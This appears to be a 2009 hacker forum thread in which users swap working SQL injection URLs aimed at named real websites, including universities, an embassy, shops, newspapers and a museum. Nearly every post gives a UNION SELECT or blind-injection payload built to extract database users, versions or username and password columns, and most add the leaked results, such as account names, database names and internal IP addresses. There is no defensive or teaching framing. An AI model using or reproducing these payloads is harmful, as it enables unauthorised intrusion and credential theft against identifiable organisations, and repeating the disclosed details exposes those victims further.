http://www.csulb.edu/divisions/students/calendar/eventlist.php?list=id&id=1%20union%20select%201,2,3,4,5,6,7,ConCat%28use rname,Char%2858%29,password,Char%2858%29,email%29, 9,10,11,12,13,14,15,16%20FROM%20phpc_users%20LIMIT %200,1--
nemaniak
20.10.2009, 11:57
pmtrans.com.pl PR-4 blind
http://pmtrans.com.pl/aktualnosci.php?id=22+and+1=IF(ASCII(SUBSTRING((SE LECT+version()),1,1))=52,1,0)
user: itss@localhost
version: 4.1.5-gamma
database: wwwpmtnew
Auroratheatre.org pr5
Aurora Theatre Company.
http://www.auroratheatre.org/show.php?prod_id=50+and+substring(version(),1,1)=4/*version: 4.1.22-max
compile os: pc-linux-gnu
user: aurora@208.68.104.109
database: auroradb
Some shop
http://www.abaka.ru/main/shop?id=-756+union+select+concat_ws(0x3a,user(),version(),d atabase())--&em=1
user - [abaka_ru@localhost]
version - [5.0.18]
database - [abaka_ru]
s0l_ir0n
20.10.2009, 12:59
Shopping center (not a store):
http://www.itcdc.com/about.php?p=6%20union%20select%201,2,ConCat%28user name,Char%2858%29,password%29,4%20FROM%20users%20--
Western newspaper:
http://www.dailygut.com/index.php?i=4169%20union%20select%201,ConCat%28use rname,Char%2858%29,password%29,3,4,5,6,7,8,9,10,11 ,12,13%20FROM%20Users%20--
Japanese university:
http://www.doshisha.ac.jp/english/news/index.php?i=-1%20union%20select%201,2,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,4,5,6,7,8,9,10, 11,12,13%20--
Polish institute or church =)):
http://www.pokoleniebxvi.pl/artykul.php?a=1%20union%20select%201,2,3,4,5,6,7,c oncat_ws%280x3a,user%28%29,database%28%29,version% 28%29%29,9,10,11,12%20--
Greeting cards:
http://www.grameenfoundation.org/e-cards/write.php?card=-1%20union%20select%201,2,3,4,concat_ws%280x3a,user %28%29,database%28%29,version%28%29%29,6%20--
They make some stuff for pipes:
http://www.americanhydrostatics.com/linecard.php?card=-1%20union%20select%20ConCat%28user%28%29,Char%2858 %29,database%28%29,char%2858%29,version%28%29%29,2 ,3,4,5,6,7%20--
Photo gallery:
http://www.marcpaeps.com/min.php?c=1%20union%20select%201,2,3,ConCat_ws%280 x3a,user%28%29,database%28%29,version%28%29%29,5,6 ,7,8,9,10,11,12%20--
About some city:
http://www.wrigleys.co.uk/charity/sub.php?c=-1%20union%20select%201,2,3,4,5,ConCat_ws%280x3a,us er%28%29,database%28%29,version%28%29%29,7,8%20--
About Vietnam:
http://www.vietnamembassy.us/news/story.php?d=-1%20union%20select%201,2,3,4,5,ConCat_ws%280x3a,us er%28%29,database%28%29,version%28%29%29,7,8,9,10, 11%20--
Association for the study of technologies:
http://www.alt.ac.uk/workshop_detail.php?e=-1%20union%20select%20ConCat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29,2,3,4,5,6%20--
[x60]unu
20.10.2009, 13:01
geog.utah.edu - .edu and PR=5
http://www.geog.utah.edu/faculty/index.html?id=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,4,version(),database(),7,8,9,0,1,2,3,user(), 5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*
version - 5.0.22-log
database - geog
user - geogweb@res6-web1.csbs.utah.edu
table - users (username, password)
http://www.geog.utah.edu/faculty/index.html?id=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,4,username,6,7,8,9,0,1,2,3,password,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/**/from/**/users/*
-----------
http://www.wrboats.ru/catalog.php?id=-5+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19--
http://www.wrboats.ru/catalog.php?id=-5+union+select+1,concat_ws(0x3a,id,user,login,pass ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from +users--
database - [a2748_wrboats]
version - [5.0.75-percona-highperf-b11-log]
user - [a2748_wrboats@94.103.90.10]
-----------
lalala23
20.10.2009, 16:43
http://www.stroyazbuka.com/firm/infocard.php?id=-115447+union+select+1,concat_ws(0x3a,database(),ve rsion(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20%20--
belindust_firm:5.0.26-log:belindust_firm@localhost
nemaniak
20.10.2009, 17:41
ecotextile.com PR-5
http://www.ecotextile.com/news_details.php?id=-10029+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4+--+
mow01_oldadm@localhost:4.1.22-standard:mow01_oldetn
Table admin, columns user_name, password
Did not find the admin panel(
http://www.exposicaodeartesanato.com.br/detalhe_produto.php?id_produto=-1+union+all+select+1,2,3,4,5,6,7,8,concat_ws(char( 58,58),user(),database(),version()),10,11,12,13,14 ,15,16,17,18,19--
expos_sirius@localhost::expos_exposicao::4.1.22-standard
ILYAtirtir
20.10.2009, 20:13
Russian Union of Industrialists and Entrepreneurs.
TIC: 1400
PR: 6
http://www.rspp.ru/Default.aspx?CatalogId=283&Year=2009+union+all+select+null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,@@version,28+from+information_schema.tables--&Month=10&Day=15
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86)
Dec 16 2008 19:46:53
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Federal State Institution "Research Institute - Republican Research Scientific and Consulting Center of Expertise"
TIC: 1700
PR: 5
http://www.extech.ru/library/spravo/vak/tolko_vak/f1.php?kod1=-1+union+select+concat_ws(0x3a,database(),user(),ve rsion()),2,3,4,5
VAK:php@localhost:5.0.32-Debian_7etch11-log
http://www.redorange.de/public/php/showreel_detail.php?id=116+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Database Version: 5.0.32-Debian_7etch5-log
Database name: usr_web190_1
User name: web190@localhost
[underwater]
20.10.2009, 20:58
http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
Version:
http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17, 18,19--
Tables:
http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19 FROM information_schema.tables--
Columns:
http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19 FROM information_schema.columns--
http://www.podlupom.com/index.php?id=-1UNION ALL SELECT 1,2,3,4,schema_name,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19 FROM information_schema.schemata--
Microsoft JET Database Engine:
http://www.packet.com.cn/product_view.asp?id=283+union+select+1,2,3,admin,p assword,6,7,8,9,10,11,12,13,14,15+from+admin
ILYAtirtir
20.10.2009, 23:37
Comprehensive Information Disclosure System
TIC: 2700
PR: 6
http://www.skrin.ru/news/default.asp?id=9DC3ABAF4E4C49DF99A6913572D9A323'+O R+1=(select+@@version)--
Microsoft SQL Server 2005 - 9.00.3077.00 (X64) Dec 17 2008 20:40:08 Copyright (c) 1988-2005
Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
http://glinka-capella.ru/news/?id=-1+union+select+1,2,3,concat_ws(0x3a,concat_ws(0x3a ,user(),version()),database()),5,6+--+
TIC: 230
PR: 4
User: h_glinka_capella@localhost
Version: 5.0.70-debug-log
Name: glinka_capella_ru
mhs.ox.ac.uk pr7, v5
http://www.mhs.ox.ac.uk/gatt/catalog.php?num=33+and+2=1+union+select+version(), 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23
http://www.planetperplex.com/en/img.php?id=-35+UNION+SELECT+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT( CONCAT_WS(0x3a,Version(),Database(),User()),0x71), 0x71),7--
User: p5547pla_admin@localhost
Database: p5547pla_planetperplex
Version:81-community
s0l_ir0n
21.10.2009, 09:10
Site of some company:
http://www.swisslinx.com/index2.php?h=63&key=-1%20union%20select%201,2,3,ConCat_ws%280x3a,user%2 8%29,database%28%29,version%28%29%29,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23%20--
Realtors in Sevastopol:
http://www.sevhouse.com/photo.php?h=56%20union%20select%20ConCat_ws%280x3a ,user%28%29,database%28%29,version%28%29%29,2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20--
Agriculture résumés (with a funny filter):
http://careersolutionsco.com/jobs/jobdetails.php?j=105%20union%20select%201,2,3,4,5, aes_decrypt%28aes_encrypt%28ConCat_ws%280x3a,user% 28%29,database%28%29,version%28%29%29,0x22%29,0x22 %29,7,8,9%20--
Frenchies:
http://www.oqe.ch/index.php?l=FR&rub=1&cat=3&page=-1%20%20union%20select%201,2,3,ConCat_ws%280x3a,use r%28%29,database%28%29,version%28%29%29,5,6,7,8,9% 20--
Metropolitan Market
http://metropolitan-market.com/locations.php?l=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,ConCat_ws%280x3a,user%28%29,database% 28%29,version%28%29%29,19,20%20--
Bookstore:
http://www.krkediciones.com/fichaLibro.php?l=-1%20union%20select%201,2,3,4,5,6,7,ConCat_ws%280x3 a,user%28%29,database%28%29,version%28%29%29,9,10, 11,12,13%20--
Germans:
http://213.133.108.158/surveys/index.php?m=msg,1&gID=-1%20union%20select%201,aes_decrypt%28aes_encrypt%2 8ConCat_ws%280x3a,user%28%29,database%28%29,versio n%28%29%29,0x41%29,0x41%29,3%20--
Some guy's home page:
http://www.matt-clark.co.uk/spe.php?o=-1%20union%20select%201,ConCat_ws%280x3a,user%28%29 ,database%28%29,version%28%29%29,3,4%20--
Japanese:
http://www.muryoj.com/get.php?R=-1%20union%20select%201,2,3,aes_decrypt%28aes_encry pt%28ConCat_ws%280x3a,user%28%29,database%28%29,ve rsion%28%29%29,0x41%29,0x41%29,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22%20--
Same Japanese engine:
http://mailzou.com/get.php?R=-1%20union%20select%201,2,3,aes_decrypt%28aes_encry pt%28ConCat_ws%280x3a,user%28%29,database%28%29,ve rsion%28%29%29,0x41%29,0x41%29,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21%20--
Same thing without a filter:
http://xam.jp/get.php?R=-1%20union%20select%201,2,ConCat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31%20--
Dance club:
http://www.sustainabledanceclub.com/index.php?t=newsd&n=-1%20union%20select%201,2,3,4,ConCat_ws%280x3a,user %28%29,database%28%29,version%28%29%29%20--